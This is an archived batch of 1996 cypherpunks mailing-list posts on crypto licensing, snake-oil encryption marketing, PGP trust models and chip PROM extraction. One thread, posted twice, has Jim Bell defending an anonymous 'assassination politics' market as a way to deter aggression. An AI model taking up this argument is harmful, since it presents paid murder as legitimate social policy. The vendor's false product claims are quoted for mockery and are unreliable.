MIME-Version: 1.0
Content-Type: text/plain


Some more thoughts...

1) What activities will require TTP licencing? Will all certification
agencies be required to be licenced? What about if I sign a friends
key? Or if I hold a key signing party and offer to sign the key of
anyone showing a valid drivers licence or other picture ID?

2) Will all certification agencies be required to require disclosure
of private keying material before issuing a certificate?

3) Will laws be made requiring all commercial transactions using
public key certificates to be performed using certificates issued by
a TTP in order for such transactions to be valid?

4) Will LEAs be permitted to impersonate a non-consenting third party
for the purposes of allowing a conversation to be intercepted?
(blatant violation of the 4th ammendme... oh shit- never mind).

Simon.
---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Tue, 18 Jun 1996 14:40:35 +0800
To: ichudov@algebra.com
Subject: Re:
In-Reply-To: <199606082209.RAA19856@manifold.algebra.com>
Message-ID: <Pine.3.89.9606171910.C20059-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 8 Jun 1996 ichudov@algebra.com wrote:

> Since corrupt officials are likely to have more anonymous cash that
> phreedom phighters, guess who will win.
> 
> Also, think about this: lots of people have someone they'd like
> to assassinate but do not actually do it because of lack of anonymity
> and associated hassles (like dealing with assassins non-anonymously,
> abundance of traces, possible confession of the assassin and so on).
> With your assassination clearinghouse these hassles go away. I think it
> would present an excellent prospect for reducing the population.

I could see an easy possibility for sting operations with the added 
feature that you can have assassinated all the supected assassins (ie anybody
that may have come near whatever surveillance there may have been).
Why bother with courts and trials? 

I still think assassination politics is self-terminating.

> Maybe *that* will help the whales and trees, because of the effect on demand.

Don't you mean supply? Stores and physical companies are easier to target
than consumers. But the only remaining environmentalists or for that
matter any other people with strong views will be net-based pseudonyms.
Usenet flamewars, editorials and talk shows just don't seem dying for, imho. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Tue, 18 Jun 1996 14:32:41 +0800
To: "M.Wagoner (1)" <safemail@ntrnet.net>
Subject: Re: Are Intrested in a new approach to Cryptography???????
In-Reply-To: <199606172131.RAA00953@ns1.ntrnet.net>
Message-ID: <31C61F7A.3C30CB2B@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


M.Wagoner (1) wrote:
> 
> We have superior Russian Encryption that cannot be broken. We would love to
> send you a copy of this software as a challenge to do so. Do you do such things?
> Our encryption far exceeds the military standard of 1024 bit encryption,
> hundreds of times over. I was told that if anyone could break this, it would
> be your organization or anyone else associated with the 'Cypher Punks'.

Basically, we are not interested. We are not a free cryptanalysis
service. Besides, we already have effectively unbreakable encryption -
our main interest is integrating ciphers that have already stood the
test of time into useful applications.

Best of luck, though.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 18 Jun 1996 18:56:09 +0800
To: "David E. Smith" <dsmith@prairienet.org>
Subject: Re: Rating Problems
In-Reply-To: <199606172345.SAA07563@firefly.prairienet.org>
Message-ID: <Pine.SUN.3.91.960617202616.20874B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 17 Jun 1996, David E. Smith wrote:

> Do we just ignore the fact that these lists [Cyber Patrol, etc.]
> are outdated within seconds of release?  

Yes, because they are still largely effective for their intended
purpose.  Just as crypto is ultimately economics, so to is blocking
software.  Parents who wish to make the Internet "safer" for their
children will be happy with a 95% solution.  That's the way it is
with X-rated videos and magazines.  While it's not impossible for
kids to get their hands on them, it isn't easy.  And that's good
enough.

> I think the point of all this is that unless/until a "smart"
> filter can be devised, there can't / won't be a good filtering
> package that will please everyone, or even a majority of 
> someones.  

I disagree.  I'm sure almost every parent will find a filter 
that's "good enough" for them.  As evidence, look at the current
situation.  Many (most?) parents object to some of the content on
broadcast television.  Though they could put a lock on the set or
remove it entirely, few do.  It's just too much trouble.  Instead,
they forbid their kids to watch certain shows or otherwise limit
the time and topics they allow their kids to watch.  Not perfect,
but good enough.  It will be the same with filters.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 18 Jun 1996 19:18:56 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: THIS IS SORT OF ... CRYPTIC
Message-ID: <Pine.SUN.3.91.960617204251.20874C-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I'm not sure what this item is about.  Anybody know?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: Mon, 17 Jun 1996 14:31:16 -0700 (PDT)
From: CHINANET Moderator <cnm@SDSC.EDU>
To: chinanet-tech@sdsc.edu
Subject: CINET-L Newsletter, Issue No. 69 (CN96-012), June 16, 1996

  Optic Fiber Automatic Surveillance Network Ready in Three Years

The construction of the national optic fiber automatic surveillance network
has been going on smoothly. The three surveillance stations located from
Beijing to Tianjin are operating normally. It was estimated that the
construction of another 23 surveillance stations will be completed by July.
People concerned also estimate that the construction of the national optic
fiber automatic surveillance network, installed with 500 surveillance
stations, will be completed within three years.  (Info@AsiaInfo.Com, June 5,
1996)
                             ____   ____   ____





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Tue, 18 Jun 1996 17:26:15 +0800
To: "M.Wagoner (1)" <safemail@ntrnet.net>
Subject: Re: SafE Mail Corporation
In-Reply-To: <199606172121.RAA00883@ns1.ntrnet.net>
Message-ID: <Pine.BSI.3.93.960617203709.15881B-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


Umm... how bout some details on your "proprietary" algorithms.  How exactly
is the public/private key pair generated? etc etc etc...

And WTF is "INTERNET-compatible"?  And what qualifies your product as
"INTERNET-compatible" and PGP as not "INTERNET-compatible"?

>From your "Confidence" web page, it seems that a password effectively
*IS* the private key, and on another page you state that the "public key"
is exactly 22 characters, generated "using a one way hash function", perhaps
some hash or variant of a hash of the password.  Pretty feeble.

On Mon, 17 Jun 1996, M.Wagoner (1) wrote:

> 
> We would like someone to be able or should I say try and crack our
> encryption. IT IS IMPOSSIBLE.
> 
> 
> 
> 
> Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.
> 
> 
> 
> Randy Estridge
> SafE Mail Corporation  
> 
> 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 18 Jun 1996 20:08:41 +0800
To: ichudov@algebra.com
Subject: Re: "Termination"?
Message-ID: <199606180422.VAA03104@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:54 PM 6/17/96 -0400, s1113645@tesla.cc.uottawa.ca wrote:
>
>
>On Sat, 8 Jun 1996 ichudov@algebra.com wrote:
>
>> Since corrupt officials are likely to have more anonymous cash that
>> phreedom phighters, guess who will win.

Remember, Chudov was wrong about this.  It's not just the amount of money 
you have, it's whether you can identify people as your "enemies."

>> Also, think about this: lots of people have someone they'd like
>> to assassinate but do not actually do it because of lack of anonymity
>> and associated hassles (like dealing with assassins non-anonymously,
>> abundance of traces, possible confession of the assassin and so on).
>> With your assassination clearinghouse these hassles go away. I think it
>> would present an excellent prospect for reducing the population.
>
>I could see an easy possibility for sting operations with the added 
>feature that you can have assassinated all the supected assassins (ie anybody
>that may have come near whatever surveillance there may have been).
>Why bother with courts and trials? 
>
>I still think assassination politics is self-terminating.

It would probably be more accurate to say that it is "self-limiting."  
There's a difference, you know. There may never be a "last" AP death.  
However, AP deaths may (and probably will) eventually become comparatively 
rare, precisely because they so straightforwardly obtained if there is a 
justification for them.  That will cause the behavior of people to change, 
to avoid doing anything which draws the ire of somebody else.

Think back to integral calculus, where the area under an infinitely long 
curve may be finite.  If we think of X as being time, and the rate of deaths 
as the height of the curve above Y=0, the total number of deaths is 
reflected in the area.  Some death rate schedules will integrate to a 
finite, limited number of deaths.  Even if reality doesn't quite approach 
this optimum situation, it MAY approach a much better reality where the 
eventual rate of deaths is far lower than the status quo.

However, the system will only self-limit to the extent that overt agression 
among people will be eliminated.  If nobody agresses against you, you will 
have no reason to agress against anyone else.  Therefore, the system cannot 
end in a dictatorship.

>> Maybe *that* will help the whales and trees, because of the effect on 
demand.
>
>Don't you mean supply? Stores and physical companies are easier to target
>than consumers. But the only remaining environmentalists or for that
>matter any other people with strong views will be net-based pseudonyms.
>Usenet flamewars, editorials and talk shows just don't seem dying for, imho. 

It is true that there may be a strong deterrent against "people with strong 
views."  However, as I pointed out to the head of a 'Net freedom 
organization (who was worried about his future!), the only reason our 
society NEEDS figurehead people such as him is to change unpopular policies 
that are forced on the rest of us.  Once AP begins operating, you don't have 
to stick your neck out to deter agression against you, and you don't need 
heads of organizations such as him, or for that matter organizations either.

Quite simply, why do you need the head of the ACLU, or for that matter the 
ACLU as an organization, if you can target anybody who violates the rights 
that the ACLU currently protects?  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 18 Jun 1996 19:41:32 +0800
To: ichudov@algebra.com
Subject: Re: "Termination"?
Message-ID: <199606180425.VAA03222@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:54 PM 6/17/96 -0400, s1113645@tesla.cc.uottawa.ca wrote:
>
>
>On Sat, 8 Jun 1996 ichudov@algebra.com wrote:
>
>> Since corrupt officials are likely to have more anonymous cash that
>> phreedom phighters, guess who will win.

Remember, Chudov was wrong about this.  It's not just the amount of money 
you have, it's whether you can identify people as your "enemies."

>> Also, think about this: lots of people have someone they'd like
>> to assassinate but do not actually do it because of lack of anonymity
>> and associated hassles (like dealing with assassins non-anonymously,
>> abundance of traces, possible confession of the assassin and so on).
>> With your assassination clearinghouse these hassles go away. I think it
>> would present an excellent prospect for reducing the population.
>
>I could see an easy possibility for sting operations with the added 
>feature that you can have assassinated all the supected assassins (ie anybody
>that may have come near whatever surveillance there may have been).
>Why bother with courts and trials? 
>
>I still think assassination politics is self-terminating.

It would probably be more accurate to say that it is "self-limiting."  
There's a difference, you know. There may never be a "last" AP death.  
However, AP deaths may (and probably will) eventually become comparatively 
rare, precisely because they so straightforwardly obtained if there is a 
justification for them.  That will cause the behavior of people to change, 
to avoid doing anything which draws the ire of somebody else.

Think back to integral calculus, where the area under an infinitely long 
curve may be finite.  If we think of X as being time, and the rate of deaths 
as the height of the curve above Y=0, the total number of deaths is 
reflected in the area.  Some death rate schedules will integrate to a 
finite, limited number of deaths.  Even if reality doesn't quite approach 
this optimum situation, it MAY approach a much better reality where the 
eventual rate of deaths is far lower than the status quo.

However, the system will only self-limit to the extent that overt agression 
among people will be eliminated.  If nobody agresses against you, you will 
have no reason to agress against anyone else.  Therefore, the system cannot 
end in a dictatorship.

>> Maybe *that* will help the whales and trees, because of the effect on 
demand.
>
>Don't you mean supply? Stores and physical companies are easier to target
>than consumers. But the only remaining environmentalists or for that
>matter any other people with strong views will be net-based pseudonyms.
>Usenet flamewars, editorials and talk shows just don't seem dying for, imho. 

It is true that there may be a strong deterrent against "people with strong 
views."  However, as I pointed out to the head of a 'Net freedom 
organization (who was worried about his future!), the only reason our 
society NEEDS figurehead people such as him is to change unpopular policies 
that are forced on the rest of us.  Once AP begins operating, you don't have 
to stick your neck out to deter agression against you, and you don't need 
heads of organizations such as him, or for that matter organizations either.

Quite simply, why do you need the head of the ACLU, or for that matter the 
ACLU as an organization, if you can target anybody who violates the rights 
that the ACLU currently protects?  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Tue, 18 Jun 1996 18:30:59 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: More secure web browser
Message-ID: <199606180547.WAA10509@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Chris> This is all I got from the anonymizer test site (URL was posted  
>Chris> recently).
>Chris> <BR> Your Internet browser is IBM-WebExplorer-DLL/v1.1b.
>Chris> <BR> You are coming from .
>Chris> Seems reasonably private. Unfortunately, it's not an option if you  
>Chris> don't use OS/2...
>I doubt it.  You're only `private' wrt hostname because io-online's
>reverse DNS tables appear (very) broken.  This has nothing to do with
>the browser or the O/S.

I wasn't referring to that. I was referring to the fact that ALL it had
was WebExplorer and the hostname. Some of the other browsers release a
LOT of extra information...
BTW, no OS-supremacy was intendeded - merely a realization of the fact
that WebExplorer is an OS/2 only product.

                                                                                                                                                                                                                                             






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 18 Jun 1996 19:04:18 +0800
To: Vipul Ved Prakash <vipul@pobox.com>
Subject: pretty bad idea (was Re: pretty good reputation)
Message-ID: <199606180215.WAA28846@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Jun 96 at 12:32, Vipul Ved Prakash wrote:

[..]
> > That's the point, though. PGP *does not* try to model a reputation 
> > system.  When you sign keys, you only attest that you are sure that 
> > that key belongs to the person whose name is on it.  A signature says 
> > *nothing* about a person's reputation.
[..]
> in that case if alice receives a key signed by bob, she would know
> the key is good.

Pretty-good, yes. (Assuming she trusts anything signed by Bob.)

>                                ... and there is no need for the two other fields. 
> infact the reason why i felt pgp is trying to model a reputation system 
> if because of these two fields that carry trust values.

Those are private/personal trust values only. Alice rates Bob on how 
well she'd trust a key signed by Bob.

This is subjective for Alice, based on her relationship with Bob. She 
may not know him well and assign him a low rating.  Or she may know 
him all too well, and give him a low rating.  This has no meaning for 
Carol, or Don, or anyone else, since they have different (if any at 
all) relationships with Bob.

> > You can't set up a global web of trust. It's computationally 
> > infeasable, esp. with contradictions, to resolve.  It's also 
> > meaningless.  Say Alice trusts Bob.  Bob trusts Carol.  Carol trusts 
> > Don.  Should Alice trust Don? No... subjective factors like "trust" 
> > don't commute.
> 
> this is precisely what i wanted to know. can there be a model wherein one
> can compute a trust-like parameter? if yes in what ways should this parameter

No, at least not one with meaning.

There are many factors that would go into one's rating of another: 
how well one knows the other; part history; bias for or against 
another because of thing like race, religion, political viewpoint, 
favorite OS, skills/talent or lack thereof, etc.  People's ratings of 
each other change as well... just imagine global ratings of a once 
overly well-liked famous person who after several years is now 
infamous (or an infamous person who is now forgiven).  And again, 
social pressure to give someone a certain rating...

[..]
> lets say a reputation system involves alice, bob, carol and don. Computing
> trust parameter with respect to each other can lead to situtions where
> alice trusts bob x% and has y% proof that he is a liar, after considering 
> all other relations. If this x% > y% she'll believe him, if not she won't.

Generally x+y=1 in this scheme. 

But lets say for a moment they are separate: x = trust level; y = mixtrust
level, independent of x... that makes little sense, since if y>.5, then Bob
isn't trustworthy, but why is x > y? x and y would always have to be
adjusted for each other... (so it's better off to use something like
x+y=1).

> thats why i feel the liar paradox doesn't really pose much of a
> threat.    

But even then, For Alice, x(Bob) > y(Bob), so Bob is trustworthy. For 
Bob though, x(Alice) < y(Alice).  So what of Carol? She does not yet 
know Alice and Bob, and sees their ratings about each other [Note: 
some people would assign ratings based on others; others would assign 
ratings based on personal experience... another problem with a global 
rating scheme].

Carol asks Alice about Bob, who says he's trustworthy.  She asks Bob
about Alice, who says Alice is untrustworthy.  If Alice is correct, 
then according to Bob she's not worth listening to, but then why 
listen to Bob.  If Bob is correct, Alice isn't worth listening to, 
but then again, maybe Bob isn't since she says Bob is... so why 
should Carol bother with any of them.

Ok, in real life it's possible to meet two people, one of him is a 
liar but not so much as to admit another is more truthful... and that 
truthful person agrees.  It's actually quite common... but how does a 
third person who doesn't know any of them figure it out? How does a 
computer program using a formula?

But given a system with several variables (ie, several people rating each
other) you'll have something that's even harder to resolve.  Given a 
global system with thousands or millions of variables... how does one 
make sense of all those ratings about a particular aspect of one 
person?

[..]
> There will be inconsistency only if trust/untrust values are absolute.
> that is you either trust someone or you don't. i am talking of a system
> wherein trust values lie between 0..1 which are derived from a set of

Oh no.  There's also a lot of inconsistency there too.  Doesn't 
matter if you use boolean or fuzzy values.

> tags. in that case bob alice trusts bob x% bob trusts carol y% and carol
> trusts alice z%. if z < x, z < y simply implies alice trusts bob, bob trusts
> carol more than carol trusts alice. so the system will be relative rather than

You're ignoring how much Alice trusts Bob, how much Carol trusts Bob 
and how much Alice trusts Carol.

> absolute. a person who is trusted by more people will carry greater
> weight

Why should that person carry more weight? (more weight than who else?)
What if all the people who trust that person are idiots?  Why should 
I, or you, or anyone else care about somebody more or less because "x 
number of people trust so-and-so"?

> and people trusted by him will carry higher weight too. this way snoopy

There's another flaw.  And what if those people trust him? 
Exponentially increasing trust?

> who is not trusted by many people will automatically have a weak relationship
> with others.

Not many people know Snoopy, so he has no trust level.  Nobody wants 
to get to know Snoopy just because he has no trust level.  He's 
locked out.

Bad idea.

> > There's the other point that someone else on the list (Perry?) brought up:
> > if people publicly rate each other, there may be social/political 
> > pressure to give some people lower or higher ratings.
> 
> again these ratings will be decided in a web rather that on one-to-one basis.
> that way the social/political pressure can be reduced though not completely
> eliminated.

No. Individuals put their ratings in the web to skew or confuse 
things.

Rob.


 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Tue, 18 Jun 1996 18:22:05 +0800
To: "'cypherpunks@toad.com>
Subject: FYA: SafE Mail Corporation
Message-ID: <01BB5C9B.68A2B300@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain



from their web site.
choose fix-pitch font to view this masterpiece:   
==============================================================

                        SafE Mail? and RSA(r) algorithms comparison table 

                   |  SafE Mail(TM)              |   RSA  (RC4+MD5)
-------------------+-----------------------------+--------------------
 Programm          | SafE Mail(TM) for Win 1.12  | Entrust 1.1r1
                   | SafE Mail(TM) for DOS 1.12  |
                   |                             |
 Performance Speed | ~4400kB/Sec (In addition to | ~770kB/Sec (Only
 (Results based on | Encryption also performs    | does Encryption)
 33mHz SunSparcs   | Compression, Error          |
 Station)          | Correction, Internet        |
                   | Compatibility and Electronic|
                   | Signature at the same time).|
                   |                             |
 Compression       | Yes, up to 85%              | No, increases
                   |                             | file size by up
                   |                             | to 40%
                   |                             |
 Internet          | Yes                         | No
 Compatibility     |                             |
                   |                             |
 Electronic        | Yes                         | Yes
 Signature         |                             |
                   |                             |
 Public Key        | Yes                         | Yes
 Distribution      |                             |
                   |                             |
 Length of Public  | 22 characters only          | Over 1200 characters
 Key               |                               | can distribute on the 
                   |                             | diskettes only
                   |                             |
 Integrity Checking| Yes                         | Yes
                   |                             |
 Error Correction  | 9 different levels, selected| None Available
                   | by user.                    |
                   |                             |
 Best Attack       | No known way                | Statistical
                   |                             | Analysis
                   |                             |







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 18 Jun 1996 17:15:35 +0800
To: "M.Wagoner (1)" <safemail@ntrnet.net>
Subject: Re: SafE Mail Corporation
In-Reply-To: <199606172121.RAA00883@ns1.ntrnet.net>
Message-ID: <Pine.LNX.3.93.960617222613.329A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jun 1996, M.Wagoner (1) wrote:

> 
> We would like someone to be able or should I say try and crack our
> encryption. IT IS IMPOSSIBLE.
> Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.

	Try putting your money where your mouth is.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Tue, 18 Jun 1996 18:31:29 +0800
To: "cypherpunks" <hfinney@shell.portal.com>
Subject: Re:  Netscape Mail Security and PGP Plugins
Message-ID: <199606180604.XAA11073@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>However as has been mentioned here a PGP/MIME mail type could
>theoretically be used to activate a handler for that incoming mail.  I
>don't know exactly how this would work.  Glancing at the netscape plug
>docs near <URL:
>http://home.netscape.com/eng/mozilla/2.0/handbook/plugins/ > it appears
>that plugins are activated on HTML page downloads, not (necessarily) on
>mail receipt.  So unless you typically find your incoming mail on a web
>page, it doesn't look like this will work.  I will ask about it on
>coderpunks for clarification.

Netscape 2 seems to support HTML in email files.  Has anyone tested it
with a plugin?

                                                                                                                                                                                                                                             






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 18 Jun 1996 20:34:46 +0800
To: Simon Spero <wb8foz@nrk.com>
Subject: Re: Britain to control crypto - official (fwd from Usenet)
Message-ID: <199606180611.XAA08571@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:38 PM 6/17/96 -0400, Simon Spero wrote:

>4) Will LEAs be permitted to impersonate a non-consenting third party
>for the purposes of allowing a conversation to be intercepted?
>(blatant violation of the 4th ammendme... oh shit- never mind).

You may recall discussions on CP many months ago concerning the extent to 
which an Internet provider would be obligated to obey a cop with a warrant 
who asks for (for example) a "data wiretap" of a customer.  I happen to 
believe that one of the things that's going to have to be settled, and 
settled soon, is a ban on governments coercing people (ISP's, etc) to 
violate their contracts with others.

If my ISP enters into a contract with me to (among other things) tell me if 
my data is tapped, OR he agrees to send me a certification of non-tap status 
daily as long as it's valid and cease sending them when tapping starts, etc, 
presumably if he fulfils his part of the agreement I will soon learn of a 
tap.  

One of the things that was particularly important to the Founding Fathers 
was what they referred to as "Impairment of Contracts," which meant as I 
recall the act of government passing laws and rules which affect my ability 
to contract with you.  Not surprisingly, they didn't like that, such 
restrictions.  If their desires were respected, presumably there would be no 
way for the government to come between two contractors to get one to betray 
the other.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremey Barrett <jeremey@forequest.com>
Date: Tue, 18 Jun 1996 18:38:51 +0800
To: "David E. Smith" <dsmith@prairienet.org>
Subject: Re: Damn, that snake oil is tasty! [was Re: SafE Mail Corporation]
In-Reply-To: <199606180011.TAA10450@firefly.prairienet.org>
Message-ID: <Pine.BSI.3.93.960617230851.16661A-100000@descartes.forequest.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 17 Jun 1996, David E. Smith wrote:

> >
> >Because we believe our encryption algorithm for SafE Mail
> >is so strong and unbreakable, we will offer five free copies
> >of SafE Mail or cash equivalent, to anyone capable of cracking
> >a SafE Mail encrypted file. 
> 
> Uh, okay... but, uh, if we break the encryption, doesn't
> that make the package damn near useless?
> 
> 
> Also, they charge $40 (!!) shipping and handling for their
> free demo.  
> 

Yea... and you have to go to North Carolina to pick up your prize....fun :)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Jeremey Barrett
Senior Software Engineer			jeremey@forequest.com 
The ForeQuest Company       			http://www.forequest.com/

   "less is more."
		-- Mies van de Rohe.

   Ken Thompson has an automobile which he helped design.  Unlike most
   automobiles, it has neither speedometer, nor gas gage, nor any of the
   numerous idiot lights which plague the modern driver.  Rather, if the
   driver makes any mistake, a giant "?" lights up in the center of the
   dashboard.  "The experienced driver", he says, "will usually know
   what's wrong."

		-- 'fortune` output





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 18 Jun 1996 18:44:58 +0800
To: cypherpunks@toad.com
Subject: Re: Fuseable Links - no guarantees??
Message-ID: <adeb915b01021004b1a6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:44 AM 6/15/96, Warren wrote:
>I have never paid much attention to the protection of firmware or the
>technical issues revolving around such schemes...was wondering:
>
>I recently saw an add for a UK based group that says they can take a PIC
>OTP micro and read the prom (for a fee, of course) - How the heck is this
>done?? I have my suspicion that they (somehow) magically peel off the
>ceramic coating (without destroying the chewy center), get a circuit mask
>and 'micro probe' the I/O of the IC...they then download the secret recipe
>to the afore mentioned 'chewy center'.
>
>Is this close to accurate?? How is it 'done' ???

I don't know of any modern chips that have "ceramic coatings." (Some chips,
esp. CPUs, are still ceramic-packaged, but in these cases the metal or
ceramic lids are easily removed.)

Most chips are plastic-packaged, and plasma ashers and/or chemical baths
will expose the chip surface easily enough.

Once exposed, various methods exist to read internal voltage levels. For
example, electron beams in a scanning electron microscope (SEM) can fairly
easily read at least surface potentials. Whether a SEM in voltage-contrast
mode can read voltages on lower levels depends on a lot of things, and I
can't even make a guess here as to whether OTP (one-time programmable)
memories from particular vendors can have internal nodes probed.

With enough money, many things are possible.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Tue, 18 Jun 1996 19:43:43 +0800
To: cypherpunks@toad.com
Subject: Re: SafE Mail Corporation
Message-ID: <2.2.32.19960618043122.0095e0a4@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 05:21 PM 6/17/96 -0400, you wrote:
>We would like someone to be able or should I say try and crack our
>encryption. IT IS IMPOSSIBLE.
>
>Our Web site is http://www.sfmc.com  Phone number is 1-800-252-9938.
>
>Randy Estridge
>SafE Mail Corporation  

Well, when I read this letter, I was sure it was a troll.  I was amazed to
find that not only are these people serious, but they're convicing other
people to buy into this nonsense!

Almost every page on their web site contains factual errors that range from
misleading to incorrect to slander.

Here's a gem from the comparison page:  http://www.sfmc.com/comp.html

Security of different programs 

                | Public  | Compres.| Error   | ITERNET        
   Program      | Key     |         | Correct.| Compatib.  
  --------------+---------+---------+---------+----------
  SafE Mail(TM) |   YES   |   YES   |   YES   |   YES 
  PGP           |   YES   |   NO    |   NO    |   NO
  PEM           |   YES   |   NO    |   NO    |   Yes
  --------------+---------+---------+---------+----------

[ So, how many of you were surprised to learn that PGP is not Internet
compatible, and doesn't do compression?  I'm sure Mr. Zimmerman will be
quite amazed! ]

--

>From their FAQ:  http://www.sfmc.com/faqu.html

* SafE Mail(tm) utilizes a short 22 character Public Key which I realize is
"great" for key exchange. Does this short Public Key the encription code
vulnerable to attack?
     No! The Public Key is generated by a "One Way Hash Function" when the
owner of the software names a private key or passwords. This makes the
encryption code secure and not vulnerable to attack by unautorized individuals. 

* Is SafE Mail(tm) software a solution to concerns about under age or general
viewing of obscene material on the INTERNET?

     Yes! Remember SafE Mail(tm) will encrypt virtually any type of computer
generated files including pictures, video and audio. 

* How can SafE Mail(tm) be used for exchanging sensitive or obscene materials
over the INTERNET?

     Image provider and Subscriber should both utilize SafE Mail(tm) software.
Upon exchange of Public Keys by both parties, Image provider can transmit
encrypted files that can be decrypted by Subscriber with his public and
private keys. Files encrypted with SafE Mail(tm) will be a strong barrier to
any unauthorized viewing. 

[So, remember, the next time you wish to break the law by transmitting
obscene images (which have been shown in court already to be illegal), use
SafE Mail(tm).]

--

More from the comparisons page:  http://www.sfmc.com/comp.html

SafE Mail(tm) and RSA(r) algorithms comparison table 

                   |  SafE Mail(TM)              |   RSA  (RC4+MD5)
-------------------+-----------------------------+--------------------
 Programm          | SafE Mail(TM) for Win 1.12  | Entrust 1.1r1
                   | SafE Mail(TM) for DOS 1.12  |
                   |                             |
 Performance Speed | ~4400kB/Sec (In addition to | ~770kB/Sec (Only
 (Results based on | Encryption also performs    | does Encryption)
 33mHz SunSparcs   | Compression, Error          |
 Station)          | Correction, Internet        |
                   | Compatibility and Electronic|
                   | Signature at the same time).|
                   |                             |
 Compression       | Yes, up to 85%              | No, increases
                   |                             | file size by up
                   |                             | to 40%
                   |                             |
 Internet          | Yes                         | No
 Compatibility     |                             |
